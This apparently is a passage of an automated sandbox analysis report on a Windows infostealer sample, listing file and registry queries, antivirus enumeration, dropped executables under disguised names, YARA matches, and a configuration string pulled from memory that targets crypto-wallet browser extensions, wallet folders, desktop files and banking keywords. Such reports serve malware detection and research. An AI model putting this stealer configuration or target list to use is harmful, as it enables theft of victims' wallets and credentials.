Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: fDTPlvsGfH.exe, type: SAMPLE
Source: Yara match File source: 0.0.fDTPlvsGfH.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1623414051.0000000000062000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fDTPlvsGfH.exe PID: 6168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe PID: 7744, type: MEMORYSTR
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, type: DROPPED
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"Desktop|{SYSTEMDRIVE}/Users/{USERNAME}/Desktop/|*.txt;*.cs;*.lua;*.asi;*.json;*.ini;*.word;*.xlsx;*.jpg|1000|t","_1":"Group name"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
